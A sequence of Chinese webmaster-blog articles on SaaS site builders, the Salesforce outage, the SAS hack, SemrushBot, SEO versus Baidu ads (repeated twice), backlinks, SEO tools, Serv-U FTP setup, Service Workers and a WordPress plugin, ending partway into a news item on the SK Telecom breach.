用户数据存储在SAAS建站服务商的服务器上,存在数据归属权不明确的问题。 如果用户需要迁移到其他平台或自行管理网站,可能会面临数据迁移困难和成本增加的问题。 续费与成本增长: 用户需要定期支付订阅费用以维持网站的正常运行,长期来看可能会增加成本负担。 部分SAAS建站服务商可能会根据服务升级或用户需求增加收费项目,导致用户成本上升。 性能与可扩展性: 对于访问量较大或需要高性能的网站来说,SAAS建站平台可能无法满足其需求。 随着网站规模的扩大和业务的发展,用户可能需要考虑自行搭建或迁移到更强大的平台。 数据安全及DDOS防御问题: 用户不再续订SAAS套餐后,网站将无法正常使用,一但SAAS平台倒闭,网站数据极可能拿不回来,导致网站无法正常运营 当网站遭遇DDOS攻击时,SAAS平台并不会为您进行防御,甚至会因DDOS攻击,对网站进行停止服务。 综上所述,SAAS建站对用户而言具有低成本、高效益、易用性、安全性、一站式解决方案和强大功能等优点;但同时也存在依赖性、数据归属、续费成本、性能与可扩展性等缺点。用户在选择SAAS建站平台时,应根据自身需求和实际情况进行权衡和选择。 #### Salesforce因DNS问题导致持续了数小时的故障 Salesforce正在竭力摆脱持续了数小时的故障,它将这次故障归咎于DNS问题。今天,这次IT崩溃事件一度非常严重,网民几乎无法访问其状态页面,工作人员不得不在帮助和培训子网站上发布最新消息。首席技术官Parker Harris在一份声明中说:“由于我们认为的DNS问题导致我们的服务无法访问,Salesforce遇到了严重故障。我们认识到给客户带来的重大影响,正在不遗余力地制定解决方案。”“我们认为已隔离了这个具体问题,正在使受影响的服务恢复在线。就在我们竭力补救的过程中,客户可能会继续遇到问题。解决这个问题仍然是Salesforce的头等大事。”停运是从协调世界时(UTC)22:00前不久开始的,这家SaaS巨头几乎完全掉线;眼下,一切还没有恢复正常。我们获悉,虽然产品已恢复如初,但是如果客户使用多因子身份验证,还是无法登录进去。这个CRM巨头在其状态页面上特别指出:“2021年5月11日UTC 21:46,Salesforce技术团队意识到了有个问题在影响诸多Salesforce服务。”“客户在浏览核心(Core)应用软件、营销云(Marketing Cloud)、商业云(Commerce Cloud)和体验云(Experience Cloud,以前名为Communities)时会遇到问题。”“这个问题还在影响Salesforce Trust网站,因为用户只能间歇访问status.salesforce.com。”大概半小时前,这家公司补充道:技术团队继续手动恢复服务。我们目前无法估计何时可以全面恢复。团队确信这起事件是内部DNS更改造成的。政府云环境现已不受影响。营销云、商业云和Heroku等服务已恢复,但是使用多因子身份验证的客户仍然无法登录进去。就在本文发稿时,Parker发推文道:“服务大部分已恢复,不过我们仍没有摆脱影响。”Salesforce简介 Salesforce是创建于1999年3月的一家客户关系管理(CRM)软件服务提供商,总部设于美国旧金山,可提供随需应用的客户关系管理平台。Salesforce允许客户与独立软件供应商定制并整合其产品,同时建立他们各自所需的应用软件。对于用户而言,则可以避免购买硬件、开发软件等前期投资以及复杂的后台管理问题。因其口号“软件的终结”,故在业内常被称作“软件终结者”。Marc Benioff 和Magdalena Yesil是最初的投资者和董事会成员,其他早期投资者还包括Larry Ellison、Halsey Minor、 Stewart Henderson、Mark Iscaro、Igor Sill和Nancy Pelosi,Marc Benioff是现任董事会主席兼CEO。2004年6月,该公司在纽约证券交易所成功上市,股票代号CRM,筹资1.1亿美元。2004年的收入就已达到1.75亿美元,拥有13,900家企业客户,注册用户达到227,000名。2012年收入突破20亿,达到22.6亿美元。在《福布斯》全球最具创新力企业排行榜上Salesforce名列首位,而且连续第四年稳居宝座。 [2]  在《财富》杂志公布的2013年全球100个最佳雇主排名中Salesforce排名第19位,在同时上榜的科技公司中仅次于Google、SAS和Qualcomm。 Salesforce又译作软件营销部队或软营,是全球按需 CRM 解决方案的领导者。因引:它拥有业界无可比拟的客户成功率。当前,全球有150,000多家公司正使用 Salesforce 的强大功能分享客户信息,以及开发具有更高收益的客户关系。 Salesforce.com提供按需定制的软件服务,用户每个月需要支付类似租金的费用来使用网站上的各种服务,这些服务涉及客户关系管理的各个方面,从普通的联系人管理,产品目录到订单管理,机会管理,销售管理等。他提供一个平台,使得客户无需拥有自己的软件,也无需花费大量资金和人力用于记录的维护,储存和管理,所有的记录和数据都储存在Salesforce.com上面。同时和普通的自己购买的软件不一样,用户随时可以根据需要去增加新的功能或者去除一些不必要的功能,真正地实时了按需使用。 #### SAS 航空公司网络遭黑客攻击 北京时间 2 月 15 日消息,据路透社报道,斯堪的纳维亚航空公司 SAS (SAS. st) 于周二晚间表示,该公司网络遭到黑客攻击,并敦促客户不要使用其应用程序,但随后表示已解决这一问题。 新闻报道称,黑客攻击导致该公司网站瘫痪了一段时间,并从其应用程序中泄露了客户信息。SAS 新闻主管卡琳・尼曼 (Karin Nyman) 在格对路透社表示,该公司正在努力补救针对其应用程序和网站的攻击。 “我们现在不能说太多,因为我们正在遭受攻击。”她说,并补充说该应用程序当时运行良好。 早些时候,她告诉国家通讯社 TT,登录该应用程序有获得错误信息的风险,并敦促客户暂时不要使用它。据 TT 称,试图登录 SAS 应用程序的用户会登录到错误的账户,并获得其他人的个人信息。 据挪威报纸 Verdens Gang 报道,这种情况也发生在挪威客户身上。许多瑞典公司和组织最近也都疑似遭到了网络攻击。 #### SemrushBot是什么?网站为什么一定要拦截SemrushBot 最近,主机帮发现旗下的一个云加速网站越来越卡,明明没有什么流量,但是服务器越来越卡。 查询访问日志后,发现一个名叫SemrushBot的爬虫一直在抓取网站,频率非常高,可以说到了丧心病狂的地步。 主机帮查了下,这个SemrushBot 是 SEMrush 的蜘蛛爬虫。 SEMrush是一家老牌的提供搜索引擎优化数据的公司,而SemrushBot 这个爬虫就是他们专门收集互联网网站数据的,对国内网站来说,一点用处都没有,国外的网站大多也屏蔽这个蜘蛛,原因是不仅网站数据暴露了,还严重影响服务器性能。 主机帮专用百度云防护自定义规则把这个蜘蛛拦截了。 昨天设置拦截后,我们今天来看拦截效果,一天拦截了几万次的SemrushBot 请求,这还不到24小时!可见SemrushBot 是有多丧心病狂。 #### SEO与百度竞价优化的区别 什么是SEO优化 通过对网站进行站内优化和修复(网站Web结构调整、网站内容建设、网站代码优化和编码等)和站外优化,从而提高网站的网站关键词排名以及公司产品的曝光度。 什么是SEO优化 通过对网站进行站内优化和修复(网站Web结构调整、网站内容建设、网站代码优化和编码等)和站外优化,从而提高网站的网站关键词排名以及公司产品的曝光度。学习加群:前面682中间644后面551 百度竞价与百度优化样式区别如下 百度竞价: 百度优化: SEO优化优点 ①关键词排名更稳定 用白帽SEO优化手法做好了排名的网站,只要维护得当,排名的稳定性非常强,所在位置数年时间也许都不会变动。 ②价格低廉 网站优化维持一年排名的费用也许只是做竞价一到两个月的费用,相比竞价要便宜的多。 ③搜索引擎通吃 即便您只要求针对百度进行优化,但结果是搜狗、360还是其他的搜索引擎,排名都会相应的提高,会在无形中给您带来更多的有效访问者。 ④无需担心恶意点击 SEO优化针对网站所做的是自然排名,不会按点击付费,不论您的竞争对手如何点,都不会给您浪费一分钱。 SEO优化缺点 ①关键词数量有限 做网站SEO优化的时候,通常一个页面布局的关键词数量4-5个,不能像百度竞价那种,想做多少做多少 ②关键词有难易程度之分 例如、手机、MP3等,做优化排名难度是很大的,这需要非常长久的时间,而且价格也会非常高昂,所以难度太大的词不适合做优化。 ③关键词排名位置 在百度竞价排名之后、这个是由百度的规则决定的,自然排名所在的位置只能在竞价排名的网站之后。 ④排名规则的不确定性 由于搜索引擎对排名有各自的不同规则,有可能在某天某个搜索引擎对排名规则进行了改变,那时也许就会出现原有的排名位置发生变动,这个是很正常的现象,届时我们将会以最快的速度研究最新的规则,将网站重新恢复排名。 ⑤关键词排名见效慢 通过白帽SEO优化手法来获得排名是无法速成的,一般难度的词大约需要2-3个月的时间,如果难度更大的词则需要4-5个月甚至更久。 什么是百度竞价 百度推广是百度的一种按效果付费的网络推广方式,简单便捷的网页操作即可给企业带来大量潜在客户,有效提升企业知名度及销售额。 百度竞价优点 ①关键词有难易程度之分 无论多么热门的关键词,只要你想做,基本都是可以进入百度竞价排名的前列 ②关键词排名见效快 百度竞价推广账户开通充值后,即可设置关键词出价,然后就可以进入百度搜索排名前十,排名位置可以通过账户后台来控制。 ③关键词数量无限制 说白了,只要您有钱,可以在后台设置无数的关键词进行推广,没有任何限制。(违禁词除外) 百度竞价缺点 ①关键词排名稳定性差 一般情况下,竞争对手的关键词出价高于你的出价,那你的关键词排名就会落后竞争对手;一旦你的百度推广账户中余额消费完/每日预算消费完,那你的关键词竞价排名就会立刻消失。 ②招聘专业竞价人员 百度竞价人员进行关键词的筛选,挑取适合的关键词,衡量价格,检查效果。通常sem专员的薪资大概在6000-8000左右 ③价格高昂 竞争激烈的词,单价可以达到数元甚至数几十元,一个月就要消费数千元甚至数万元,如果是长期做,那就需要长期花费如此高昂的费用。 ④账户管理较复杂 如果要保证关键词排名位置且要控制投入成本,需要每天都进行账户消费统计,设置最合适的价格来进行竞价。 ⑤提防恶意点击 百度竞价排名的恶意点击基本无法避免,很多时候账户中的预算会被竞争对手、广告公司、闲着无聊的人给恶意点击点没的,并且不会给你产生任何转化。 ⑥搜索引擎各自独立 不同搜索引擎都是相互独立的,比如你在百度做了竞价后,谷歌那不会出现排名,雅虎那也不会出现排名。如果你想要所有搜索引擎都出现付费推广关键词排名,那就要在不同搜索引擎平台开户并充值推广费用。 SEO优化优点 ①关键词排名更稳定 用白帽SEO优化手法做好了排名的网站,只要维护得当,排名的稳定性非常强,所在位置数年时间也许都不会变动。 ②价格低廉 网站优化维持一年排名的费用也许只是做竞价一到两个月的费用,相比竞价要便宜的多。 ③搜索引擎通吃 即便您只要求针对百度进行优化,但结果是搜狗、360还是其他的搜索引擎,排名都会相应的提高,会在无形中给您带来更多的有效访问者。 ④无需担心恶意点击 SEO优化针对网站所做的是自然排名,不会按点击付费,不论您的竞争对手如何点,都不会给您浪费一分钱。 SEO优化缺点 ①关键词数量有限 做网站SEO优化的时候,通常一个页面布局的关键词数量4-5个,不能像百度竞价那种,想做多少做多少 ②关键词有难易程度之分 例如、手机、MP3等,做优化排名难度是很大的,这需要非常长久的时间,而且价格也会非常高昂,所以难度太大的词不适合做优化。 ③关键词排名位置 在百度竞价排名之后、这个是由百度的规则决定的,自然排名所在的位置只能在竞价排名的网站之后。 ④排名规则的不确定性 由于搜索引擎对排名有各自的不同规则,有可能在某天某个搜索引擎对排名规则进行了改变,那时也许就会出现原有的排名位置发生变动,这个是很正常的现象,届时我们将会以最快的速度研究最新的规则,将网站重新恢复排名。 ⑤关键词排名见效慢 通过白帽SEO优化手法来获得排名是无法速成的,一般难度的词大约需要2-3个月的时间,如果难度更大的词则需要4-5个月甚至更久。 什么是百度竞价 百度推广是百度的一种按效果付费的网络推广方式,简单便捷的网页操作即可给企业带来大量潜在客户,有效提升企业知名度及销售额。 百度竞价优点 ①关键词有难易程度之分 无论多么热门的关键词,只要你想做,基本都是可以进入百度竞价排名的前列 ②关键词排名见效快 百度竞价推广账户开通充值后,即可设置关键词出价,然后就可以进入百度搜索排名前十,排名位置可以通过账户后台来控制。 ③关键词数量无限制 说白了,只要您有钱,可以在后台设置无数的关键词进行推广,没有任何限制。(违禁词除外) 百度竞价缺点 ①关键词排名稳定性差 一般情况下,竞争对手的关键词出价高于你的出价,那你的关键词排名就会落后竞争对手;一旦你的百度推广账户中余额消费完/每日预算消费完,那你的关键词竞价排名就会立刻消失。 ②招聘专业竞价人员 百度竞价人员进行关键词的筛选,挑取适合的关键词,衡量价格,检查效果。通常sem专员的薪资大概在6000-8000左右 ③价格高昂 竞争激烈的词,单价可以达到数元甚至数几十元,一个月就要消费数千元甚至数万元,如果是长期做,那就需要长期花费如此高昂的费用。 ④账户管理较复杂 如果要保证关键词排名位置且要控制投入成本,需要每天都进行账户消费统计,设置最合适的价格来进行竞价。 ⑤提防恶意点击 百度竞价排名的恶意点击基本无法避免,很多时候账户中的预算会被竞争对手、广告公司、闲着无聊的人给恶意点击点没的,并且不会给你产生任何转化。 ⑥搜索引擎各自独立 不同搜索引擎都是相互独立的,比如你在百度做了竞价后,谷歌那不会出现排名,雅虎那也不会出现排名。如果你想要所有搜索引擎都出现付费推广关键词排名,那就要在不同搜索引擎平台开户并充值推广费用。 #### seo外链是否还有效? 相信还有很多人都很重视外链,每天都在想哪些平台外链效果好,现在该如何发外链。不过随着百度算法升级,对垃圾外链的打击,在逐步弱化外链,也有很多人开始越来越重视网站内容了。 那么到底现在外链还有用吗?这个答案很明显,外链现在还是有用的,不过对外链的要求是越来越高了,高质量的外链起到的作用会大一些。下面主机吧从以下三个方面为大家分析: 1.当前百度对外链的重视程度 大家多多少少也了解到了百度外链算法的升级,大力打击垃圾外链,黑链,链接交易,明显是在弱化外链,但并不代表说外链就没有作用了,只是要求越来越高,不能像之前那样批量发布大量的无用链接,高质量的外链才是核心要点。 2.当前外链对网站的作用 无可置疑外链对网站的作用还是有的,它起到一个投票效果。建站初期合理的外链可以有效吸引蜘蛛的抓取,改善网站的收录情况,提供网站的整体权重,不过做什么事情都要有个度,合理才是最重要的,不能一开始就大批量增加,质量胜过数量。 3.现在应该如何做外链 说到做外链,不得不说一下外链链接的类型,分3种:文本链,超链接,锚文本。不同的链接有不同的效果,大家可以根据自己网站的实际情况来做相应的链接。根据笔者的经验,现在做外链效果比较好的有:高质量友情链接,高权重博客链,单向友链。 外链的作用还是有的,不过大家也要根据自己网站的实际情况来看,一般小站靠外链,大站靠内链。 #### SEO必备神器:站长之家SEO监控轻松批量免费分析网站数据 目前国内优质的SEO工具已经越来越少了,之前有介绍过站长之家的一些SEO工具,用得挺不错的。 不过最近主机吧发站长之家新出了一个SEO监控神器,可以很轻松的监控网站的数据。主机吧自己试了下,非常不错,以下是官方介绍: 点击图片直接访问“SEO监控”工具 目前“SEO监控”已经上线的功能包括:网站监控,关键词排名,关键词指数,网站收录,网站TDK、友情链接等多个功能。 为了让站长们能更快获取网站各项数据,近期我们升级了“SEO监控”功能,对监控网站和关键词排名监控两个核心功能进行了优化。 不少已经体验过站长都反馈表示,更新后的功能“真香”! 一、批量监控多个网站数据 对于站长而言,当自己有多个网站或想监控多个竞争对手网站时,如果逐个查看是非常麻烦,且效率低下。 站长工具“SEO监控”功能解决了这个问题,可以帮助大家批量监控多个站点SEO数据。它可以一次性监控多个网站的(百度、360、神马、头条)权重、收录量、排名关键词等重要SEO数据。 1)实现群站监控 可直接将想要监测的网站添加到后台,既可批量查看多个目标网站目前在不同搜索引擎的SEO情况,而不需要每次都到站长工具逐个查询。如下图, 展开后,即可查看所添加网站的关键词数和收录趋势图,整个站点的情况一目了然。 2)网站分类 大家还可对监控的网进行分类,比如分类为公司网站,和竞争对手网站,方便查看。 3)关键词涨跌 监控网站变动的关键词超过100个,同时比例超过30%,也可可以在涨跌页面查看。 4)网站域名安全检测和备案监控。 在监控网站过程中,站长们还可直接查看网站域名安全状态以及备案检测情况。 比如,检测域名是否被QQ或微信拦截,一旦发现被拦截的话站长可第一时间去处理,避免网站从QQ微信的流量下降受影响。 另外,还可以及时了解备案监控状态,避免网站备案号掉了,造成网站无法打开的烦恼。 二、全面监控网站关键词排名 网站关键词排名无疑是站长们最关心的问题之一,而站长工具的关键词排名监控能升级后,更方便大家了解自己和竞争对手的网站关键词排名整体水平。 大家在关键词排名一栏,添加网站后,即可查看网站关键词和监控关键词的情况。比如添加站长之家网址(www.chinaz.com),可以直接看到站长之家网站关键词具体排名,以及对重点关键词进行监控。 1)支持监控重点关键词 在网站众多的关键词中,显然需要有目的性的监控部分关键词的情况。“SEO监控”支持将比较关心的关键词加入监控,实时了解排名的变化情况,排名要是下降了,就能第一次时间了解到,从而对工作作出调整。 添加目标监控关键词加,在监控关键词页面看到该关键词当前排名,以及最近7天、30天以及90天的整体排名趋势。 2)支持添加未收录关键词 功能升级后,监控关键词功能可添加站长工具未收录的关键词,新关键词有百度指数的话站长工具会更新收录。 如果新关键词没有百度指数,也可在监控关键词中查看该关键词排名情况。 3)监控全站关键词更便捷 切换到网站关键词页面,大家可以看到网站所有关键词在搜索引擎的排名情况,包括全网指数、PC指数、移动指数等。 以往,添加关键词需要自己想,或者需要到站长工具那边查看。现在可直接在网站关键词这边搜索目标键词,使用更便捷。 另外,在查看全站关键词的同时,可以直接点击“加入监控按钮”,之后就能出现在“监控关键词”页面,无需手动添加。 4)纠错功能 网站有些关键词排名不够准确,大家可点击纠错。后台会对排名不准确的关键词,多个节点请求排名情况,对该关键词进行排名更新。 除了分析自己网站的数据,大家还可以利用关键词监控功能添加竞争对手的网站,并分析竞争对手都有哪些关键词,把比较重点的关键词加入到监控中。 当然,除了批量监控网站和关键词排名情况,大家还可要直接使用“SEO监控”监控网站其它重要数据。比如: 查看所关心的关键词指数,以及整体走势▼ 网站收录在各大搜搜引擎的情况、友情链接等网站数据▼ 还可以详细的知道网站友情链接总数、反链情况▼ 总而言之,站长之家“SEO监控”工具让大家在SEO工作时,能够更简单,更方便,效率更高。后续,我们将完善以及开发更多监控功能,帮助站长高效完成网站数据分析工作。 #### SEO经验:百度排名只需分析关键词数据 百度排名一直是SEOER重点关注的,搜索引擎优化虽然没有以前那么重要,不能和流行的PPC比,但是依然占据网络营销的半壁江山,特别是一些行业做一些长尾关键词的排名转化效果还是非常可观的,这点可以从网络上到处是SEO优化培训的广告得到印证。 那么SEO到底是什么呢? 相信还有很多的小白用户没弄明白,到底应该怎么去做排名,很多的SEOER都跑去关注一些所谓的SEO技巧去了,把心思都花在了这些所谓的百度快速排名技巧上面,而没有真正的去研究搜索引擎的数据,没有去分析所做的关键词在百度里的数据。 先说说SEO的核心是什么,大家都知道核心是用户体验做原创内容、及时更新对吧,从古至今大家一致提倡的都是这点,所以只要你一提到SEO,大家就会教你说做好用户体验多做原创内容,不要去复制采集没营养的文章等等。 那么如何做用户体验呢?之前小七在一次SEO交流会上问过大家都是如何做用户体验的,大家的一致回答几乎就是做原创内容,小七认为这是一个误导,我相信百分九十的SEOER都被这个谎言给误导了,倘若你没有分析搜索引擎的数据,就一味的写原创内容是得不到好的排名。下面来看个案例: 这个案例是小七在一个SEO的公开课上看到的,搜索“玻璃盖”这个关键词,百度排名除了自己的产品之外就是它第一,而且还排名很稳定,小七观察很久了。可以打开这网站。 大家可以看到这个网站更新的内容是2015年8月30日的,之后首页就再也没有更新过,那么这样的一个页面百度为何能给于这么好的排名?不都说要做用户体验,要经常更新搜索引擎才更喜欢么? 你注意观察,这些文章的标题都是与玻璃盖相关的,告诉百度这个首页就是和玻璃盖这个词的聚合页面。有兴趣的可以点新闻页面看看,2016年还有更新过文章,但是故意首页不调用了,只调用了这几条相关的页面。 其实这就是百度,一味的原创和更新内容并不是排名的王道,我们要做的应该是分析百度的数据,如果你是一个合格的SEOER,不应该去追求所谓的SEO技巧,什么一招就能获得如何好的黑冒手段,而是多去研究你要做排名的关键词的数据,这些数据百度都有给出来。 下面我们以 “ seo工具”这个关键词为案例,假如我们要做好这个词的排名,那么我们应该如何去分析。 百度指数 只要你是个站长,百度指数你一定知道,但是我相信百分九十站长只看到指数搜索多少,没有去研究百度指数这个页面。 这张百度指数的需求图谱小七不知道有多好人有研究过,你研究好这张图谱就知道什么是用户体验,并非是我们主观的想能给什么东西给用户才叫用户体验,所谓的用户体验应该要从百度数据里去获取,让百度的数据说话,让数据告诉我们用户需要什么内容,那我们就做什么内容给用户,这样的页面才能获得排名。 上图包含着巨大的信息量,2018年4月份的时候“SEO工具”这个词最相关的几个词是站长工具、优化、站长、seo必备工具、SEO查询工具、SEO站长工具等,有了数据你就知道用户需要什么,做页面的时候应该要做哪些内容的聚合才能获得好的排名。 其中还带有日期,这个日期有什么作用?你可以去看每个月“SEO工具”这个关键词所对应的需求是什么,定期的根据这个数据去做页面聚合调整,这才是所谓的更新。 关键词质量分析 什么是关键词质量分析,如果你有去分析百度的搜索结果数据就会知道,百度是将一个关键词分成若干个词,然后重新组合出新的关键词参与索引,并且给分词后的词赋予不同权重体现核心,我们还是以“SEO工具”这个关键词为例子。 这是分析牛关键词质量分析工具查询得到的结果,从图上我们可以看到,百度把“SEO工具”分割成了SEO和工具这两个词,并且SEO的权重远远高于工具这个词。 也就是说“SEO工具”这个词的核心重点是SEO,这个数据是百度一个内部查询接口给的数据,所以用户需要的数据都可以在百度里挖掘出来。 另外从图上我们也可以看到分词组合后得到三个价值词SEO、SEO工具、工具,这些词都是会被百度建立索引参与排名的重要因素,下图是我从百度搜索结果截图的。 至于这些分词后的词和组合的关键词如何使用,之前有写过一篇“如何优化长尾关键词”有详细介绍,有兴趣的老铁可以关注下。 总结:真正的 SEO优化并非一个投机取巧,也无需刻意的去学习网络上的一些快速排名技巧,百度或者其他搜索引擎排名的因素非常多,并非一两个因素,而且网络上很多所谓的SEO技巧无非就是一些老生常谈的常识和大框架。 细节上的操作还需要自己多动手摸索,还是多去搜索引擎上找答案,用户想要的东西搜索引擎都已经给出来,我们只需要去做好这些慢慢就能获得排名。 作者:seven 公众号:fenxiniu #### SEO超级外链工具是什么有用吗? 刚开始建站的时候,很多站长为了方便总会利用一些自动化软件来操作。比如超级外链工具,就很多人用。SEO超级外链工具是什么?所谓的超级外链工具就是利用程序指令批量查询几千个网站收录查询网站,形成生成以http://seo.chinaz.com/zhujib.com这样的链接,达到大量生成外链的效果。这些外链真的有用吗?其实说有用,还是有用的,对于刚建站有朋友来说,超级外链工具确实可以吸引搜索引擎蜘蛛访问你的网站。但也有弊,这类查询的外链地址是非常不稳定的,也就是存在时间不长,有的也就几小时,搜索引擎会把这些外链叛定为低质量外链,甚至垃圾外链,对网站长期来说影响很大。所以主机吧建议,网站建设前期可以利用超级外链吸引下百度蜘蛛收录,一但收录后建议立即停止使用,以手动发稳定外链为主。 #### Serv-u FTP服务器图文安装教程及使用方法 很多站长装网站环境的时候,并没有装FTP软件,也就导致了服务器空间没办法FTP上传,现在很多windows服务器都是使用serv_u作为ftp服务器,一般情况下我们使用Serv-U FTP Server v6.4.0.6,这里以serv_u 10.3为例介绍下,方便需要的朋友 一、安装 *测试平台Windows XP SP3 *版本Serv-u10.3 下载最新版本的serv-u10.3执行文件安装,安装成功后开始配置serv-u。   二、配置 1、新建域(test) 点击新建域,开始域的创建。   输入域名:test和备注:我的第一个FTP服务器。执行下一步。   这里的参数保持默认,FTP端口默认为21,也可以改为其他不冲突的端口(出于安全方面考虑)执行下一步。   这里的IP地址,由于是本地测试,选择局域网内的地址192.168.6.128即可作为一会儿服务器的IP访问。执行下一步。   这里的加密手段视具体情况而定。单击“完成”完成域的创建过程。 2、新建用户 完成了域的创建,下面想去访问FTP服务器,当然需要创建用户,管理员也可以在这个时候创建,方便维护和管理。 使用“向导”创建用户。   这里的用户名是作为访问FTP用户身份的。为访问者所持有域管理员有修改的权限,可以对其权限进行修改和限制,这里测试就输入test,可以随意。执行下一步。   默认密码为一串随机密码不大方便记忆,但是安全性能相对较高,我们做测试就用不着了,写个test的密码就行了吧。但是在实际应用中不应该出现类似test的账号和密码,因为安全性能极低。执行下一步。   选择根目录,也就是用户登录以后停留在的物理目录位置,我事先在C:\盘下建立了FTP这个目录。选择好目录。 Serv-u的安装及使用  来源:连邦IT服务平台   编辑:黄燕飞  发布时间:12-02-29   执行下一步。   这里是对用户的访问权限的设定,有只读和完全访问两种。 只读的话用户就不能修改目录下的文件信息,将以只读的方式访问。如果用户要下载上传修改目录下的文件的话,就将他的权限设置为完全访问。单击“完成”完成用户的创建。 三、FTP的访问 在浏览器地址栏输入FTP服务器的地址(上文的地址是“http://192.168.6.128”)   输入用户名(test)密码(test)登陆   成功进入FTP服务器设定的目录下,里面的两个文件事先新建好的。能够对其实现下载到本地,和上传文件。   至此SERV-U的安装和使用基本完成了。 四、其他配置   比如致欢迎词等都可以在用户属性设置里设置。 还能通过设置访问时间来限制用户访问FTP空间的时间。 这里的FTP用户“test”是“无权限”可以通过修改它的权限将其升级为域管理员,拥有更高的权限,比如配置域,增删用户的权力。   比如这里我将test的权限升级为“域管理员” 再次web终端访问FTP服务器即可登陆到域配置界面,即可进行配置。 #### Service Worker百科 随着前端快速发展,应用的性能已经变得至关重要,关于这一点大佬做了很多统计。你可以去看看。 如何降低一个页面的网络请求成本从而缩短页面加载资源的时间并降低用户可感知的延时是非常重要的一部分。对于提升应用的加载速度常用的手段有Http Cache、异步加载、304缓存、文件压缩、CDN、CSS Sprite、开启GZIP等等。这些手段无非是在做一件事情,就是让资源更快速的下载到浏览器端。但是除了这些方法,其实还有更加强大的Service Worker线程。 Service Worker与PWA的现状 说起service worker就不得不提起PWA了,service worker做为PWA的核心技术之一,多年来一直被Google大力推广,这里简单介绍一下。 通俗来说,PWA就是渐进式web应用(Progressive Web App)。早在16年初,Google便提出PWA,希望提供更强大的web体验,引导开发者回归开放互联网。它弥补了web对比Native App急缺的几个能力,比如离线使用、后台加载、添加到主屏和消息推送等,同时它还具备了小程序标榜的“无需安装、用完即走”的特性。 虽然PWA技术已经被W3C列为标准,但是其落地情况一直以来是很让人失望的,始终受到苹果的阻碍,最重要的原因在于PWA绕过Apple Store审核,直接推给用户。如果普及,这将威胁到苹果的平台权威,也就意味着苹果与开发者的三七分成生意将会落空。 所以一直以来safrai不支持mainfest以及service worker这两项关键技术,即使在18年开始支持了,但是对PWA的支持力度也远远低于安卓,具体体现在service worker缓存无法永久保存,以及service worker的API支持不够完善,一个最明显的不同在于安卓版本的PWA会保留你的登录状态,并且会系统级推送消息。而在苹果上,这两点都做不到。也就是说,iPhone上的微博PWA,每次打开都要重新登录,而且不会收到任何推送信息。 另外由于某些不可描述的原因,在国内无法使用Service Worker的推送功能,虽然国内已经有两家公司做了service worker的浏览器推送,但是成熟度还有待调研。 由于目前各版本手机浏览器对service worker的支持度都不太相同,同一个接口也存在差异化还有待统一,之于我们来说,也只能用Service Worker做一做PC浏览器的缓存了。 Service Worker的由来 Service Worker(以下简称sw)是基于WEB Worker而来的。 众所周知,javaScript 是单线程的,随着web业务的复杂化,开发者逐渐在js中做了许多耗费资源的运算过程,这使得单线程的弊端更加凹显。web worker正是基于此被创造出来,它是脱离在主线程之外的,我们可以将复杂耗费时间的事情交给web worker来做。但是web worker作为一个独立的线程,他的功能应当不仅于此。sw便是在web worker的基础上增加了离线缓存的能力。当然在 Service Worker 之前也有在 HTML5 上做离线缓存的 API 叫 AppCache, 但是 AppCache 存在很多缺点,你可以亲自看看。 sw是由事件驱动的,具有生命周期,可以拦截处理页面的所有网络请求(fetch),可以访问cache和indexDB,支持推送,并且可以让开发者自己控制管理缓存的内容以及版本,为离线弱网环境下的 web 的运行提供了可能,让 web 在体验上更加贴近 native。换句话说他可以把你应用里的所有静态动态资源根据不同策略缓存起来,在你下次打开时不再需要去服务器请求,这样一来就减少了网络耗时,使得web应用可以秒开,并且在离线环境下也变得可用。做到这一切你只需要增加一个sw文件,不会对原有的代码产生任何侵入,是不是很perfect? Service Worker基本特征 无法操作DOM 只能使用HTTPS以及localhost 可以拦截全站请求从而控制你的应用 与主线程独立不会被阻塞(不要再应用加载时注册sw) 完全异步,无法使用XHR和localStorage 一旦被 install,就永远存在,除非被 uninstall或者dev模式手动删除 独立上下文 响应推送 后台同步 。。。 service worker是事件驱动的worker,生命周期与页面无关。 关联页面未关闭时,它也可以退出,没有关联页面时,它也可以启动。 Dedicated Worker以及Shared Worker与Service Worker三者非常重要的区别在于不同的生命周期。对于Service Worker来说文档无关的生命周期,是它能提供可靠Web服务的一个重要基础。 Service Worker生命周期 register 这个是由 client 端发起,注册一个 serviceWorker,这需要一个专门处理sw逻辑的文件 Parsed 注册完成,解析成功,尚未安装 installing 注册中,此时 sw 中会触发 install 事件, 需知 sw 中都是事件触发的方式进行的逻辑调用,如果事件里有 event.waitUntil() 则会等待传入的 Promise 完成才会成功 installed(waiting) 注册完成,但是页面被旧的 Service Worker 脚本控制, 所以当前的脚本尚未激活处于等待中,可以通过 self.skipWaiting() 跳过等待。 activating 安装后要等待激活,也就是 activated 事件,只要 register 成功后就会触发 install ,但不会立即触发 activated,如果事件里有 event.waitUntil() 则会等待这个 Promise 完成才会成功,这时可以调用 Clients.claim() 接管所有页面。 activated 在 activated 之后就可以开始对 client 的请求进行拦截处理,sw 发起请求用的是 fetch api,XHR无法使用 fetch 激活以后开始对网页中发起的请求进行拦截处理 terminate 这一步是浏览器自身的判断处理,当 sw 长时间不用之后,处于闲置状态,浏览器会把该 sw 暂停,直到再次使用 update 浏览器会自动检测 sw 文件的更新,当有更新时会下载并 install,但页面中还是老的 sw 在控制,只有当用户新开窗口后新的 sw 才能激活控制页面 redundant 安装失败, 或者激活失败, 或者被新的 Service Worker 替代掉 Service Worker 脚本最常用的功能是截获请求和缓存资源文件, 这些行为可以绑定在下面这些事件上: install 事件中, 抓取资源进行缓存 activate 事件中, 遍历缓存, 清除过期的资源 fetch 事件中, 拦截请求, 查询缓存或者网络, 返回请求的资源 #### Simple Lightbox插件:美化wordpress图片附件打开效果 经常使用wordpress上传图片的站长都知道,很多时候要上传一些高清图片,但是发布后,展示出来的效果其实都是裁剪过的,或者缩略图,效果不是很好。 而Simple Lightbox插件可以解决这个问题,可以实现灯箱效果展示。简单的说就是可以让文章内的图片在点击后弹出一个类似于幻灯片的效果,实现点击查看高清图片的目的。 效果如下: 安装方法: 直接进入wordpress插件市场搜索Simple Lightbox,安装即可。 官方下载地址:https://wordpress.org/plugins/simple-lightbox/ 如果下载不了可以直接用主机吧的网盘下载. #### SK Telecom遭黑客攻击致SIM卡信息泄露!官方回应泄露详情及用户防范指南 当地时间4月22日,韩国三大电信运营商之一SK Telecom(SK电讯)发布公告称,其于4月19日深夜遭遇黑客恶意软件攻击,导致部分用户SIM卡关联信息泄露。目前官方已采取紧急措施,并承诺加强安全防护。以下是事件详情及用户应对建议。 事件核心信息 1️⃣ 攻击时间与泄露内容 时间:2024年4月19日深夜 泄露数据:用户SIM卡相关敏感信息(具体范围仍在调查中)。 2️⃣ 